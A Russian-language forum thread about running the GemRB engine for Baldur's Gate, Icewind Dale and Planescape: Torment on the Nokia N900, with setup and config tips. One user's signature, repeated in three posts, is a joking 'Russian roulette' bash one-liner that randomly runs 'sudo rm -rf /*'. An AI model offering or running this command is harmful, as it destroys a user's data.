1 (18.02.2011 15:16:18 отредактировано flashgc)

Тема: GemRB (Baldurs Gate, IceWind Dale)

GemRB (Game engine made with preRendered Background) – это портируемая реализация движка Bioware Infinity Engine с открытыми исходниками. Используя GemRB, можно запускать игры, использующие Bioware Infinity Engine, на Nokia N900.

http://www.wargamecn.org/antiacui/Screenshot-20100422-232018.png

Поддерживаемые игры:
» Baldur’s Gate 1 (inc ToS), 2
» Icewind Dale 1 (inc HoW),2
» Planescape: Torment

Чтобы играть в эти игры, необходимо иметь оригинальные копии данных этих игр.

Что то я не нашел темы по этому движку.
В репозитории лежит версия 0.6.1. Последняя же версия на офф сайте 0.6.3. Мог бы кто-нить собрать ее для Маемо? Просто я в линуксе не силен и поэтому не знаю как запустить более свежую версию. smile

2

Re: GemRB (Baldurs Gate, IceWind Dale)

Да хорошии игры уже БГ1 прошел и БГ2 середине  на н900. Вот кстати сылка с видеом игры на н900 http://www.youtube.com/watch?v=Uo5qLyVlHGU . Жалко только правая кнопка мыши не реализована пока но она и ненужна особа. Да жалко что автор подзабил на обновления мож скоро и опомнится. В андрюше кстати есть последния версия если так не терпится 6.3

Поделиться

3

Re: GemRB (Baldurs Gate, IceWind Dale)

a0014 пишет:

Да жалко что автор подзабил на обновления мож скоро и опомнится. В андрюше кстати есть последния версия если так не терпится 6.3

Да нафига андрюша. Надо под наш собрать - все для этого есть, только надо знающего человека) Да и версию 0.6.1 не авторы GemRB ее компилили под Маемо.

Поделиться

4

Re: GemRB (Baldurs Gate, IceWind Dale)

Да ее собрал некто Kamen Bundev с ником Bundyo (кстати он из какоито кириллеца говорящии страны но ток не с России и Украины) вот страничка где обуждают GemRB  http://talk.maemo.org/archive/index.php/t-16947.html . Кстати он собрал еще и эмулятор для Ультимы 7 (правдо если запускать русскую то там шрифты не поддерживаются  sad  sad   )

Поделиться

5

Re: GemRB (Baldurs Gate, IceWind Dale)

Тащемта инструкцию в студию, и файлики нужные тоже желательно, шикарные игры же.
З.Ы. Люди плохо реагируют на тему, назовите ее Baldur’s Gate 1/2, Icewind Dale 1/2, Planescape: Torment для n900, и народ потянется)

Поделиться

6

Re: GemRB (Baldurs Gate, IceWind Dale)

The IV пишет:

Тащемта инструкцию в студию, и файлики нужные тоже желательно, шикарные игры же.
З.Ы. Люди плохо реагируют на тему, назовите ее Baldur’s Gate 1/2, Icewind Dale 1/2, Planescape: Torment для n900, и народ потянется)

ставишь себе gemrb
далее: ставишь на комп себе Baldur’s Gate 1/2, Icewind Dale 1/2, Planescape: Torment
и кидаешь её в рандомный каталог на своём телефоне.
потом внимательно читаем файл, который открыли и правим. файл закомментирован хорошо, разжёвывать смысла не вижу. сохраняем и запускаем gemrb

русская рулетка для вашего линукса:
[ $[ $RANDOM % 6 ] == 0 ] && sudo rm -rf /* || echo "Ваша система ещё жива"

Поделиться

7

Re: GemRB (Baldurs Gate, IceWind Dale)

sa1nt пишет:
The IV пишет:

Тащемта инструкцию в студию, и файлики нужные тоже желательно, шикарные игры же.
З.Ы. Люди плохо реагируют на тему, назовите ее Baldur’s Gate 1/2, Icewind Dale 1/2, Planescape: Torment для n900, и народ потянется)

ставишь себе gemrb
далее: ставишь на комп себе Baldur’s Gate 1/2, Icewind Dale 1/2, Planescape: Torment
и кидаешь её в рандомный каталог на своём телефоне.
потом внимательно читаем файл, который открыли и правим. файл закомментирован хорошо, разжёвывать смысла не вижу. сохраняем и запускаем gemrb

Мерси, осталось только новой версии дождаться под маэмо smile .

Поделиться

8

Re: GemRB (Baldurs Gate, IceWind Dale)

The IV пишет:

Мерси, осталось только новой версии дождаться под маэмо

да не за что, только есть специальная кнопочка "поблагодарить"
ну и это... как-то не очень играть в бг2 на экране в 3,5"  neutral
вот бы выпустили чего-нить такое-же масштабное, но специально под телефоны :мечты:

русская рулетка для вашего линукса:
[ $[ $RANDOM % 6 ] == 0 ] && sudo rm -rf /* || echo "Ваша система ещё жива"

Поделиться

9

Re: GemRB (Baldurs Gate, IceWind Dale)

у меня есть бг1 как это все правильно настроить, gemrb уже поставил, не могу чет разобраться

s56.radikal.ru/i153/1001/6a/b52cb4e408eb.gif

Поделиться

10

Re: GemRB (Baldurs Gate, IceWind Dale)

rds92 пишет:

у меня есть бг1 как это все правильно настроить, gemrb уже поставил, не могу чет разобраться

скидываем папку с бг1 в MyDocs. Т.к. прога изначально настроена на бг2, то придется подправить конфиг  gemrb.cfg, который лежит в папке home/user/.gemrb
Там нужно будет подправить пути до каждого диска игры, типа /home/user/MyDocs/bg1/CD2/

Желательно запускать игру из терминала командой gemrb, чтобы можно было понять почему не запускается.

Поделиться

11

Re: GemRB (Baldurs Gate, IceWind Dale)

и что ни одного доброго, бородатого линуксовода здесь нет?

Поделиться

12

Re: GemRB (Baldurs Gate, IceWind Dale)

sss пишет:

и что ни одного доброго, бородатого линуксовода здесь нет?

все злые и выбритые до синевы. а вы с какой целью оффтопите?

русская рулетка для вашего линукса:
[ $[ $RANDOM % 6 ] == 0 ] && sudo rm -rf /* || echo "Ваша система ещё жива"

Поделиться

13

Re: GemRB (Baldurs Gate, IceWind Dale)

не могу запустить baldur's gate 1 вроде всё правильно настроил, а не запускается пишет что не может открыть файл gemrb.ini

Поделиться

14

Re: GemRB (Baldurs Gate, IceWind Dale)

Помогите, может кто сталкивался, вообщем установил я Planescape: Torment, прописал конфиг, игра запускается нормально, включается меню идет загрузка, а после появляется синий экран и что самое интересное видна панель управления и она работает т.е. я могу выйти обратно в меню, а все игровое пространство представляет собой синее поле.

Post's attachments

screenshot01.png 70.4 kb, файл ни разу не был скачан. 

У Вас недостаточно прав для загрузки файлов, прикрепленных к этому сообщению.

Поделиться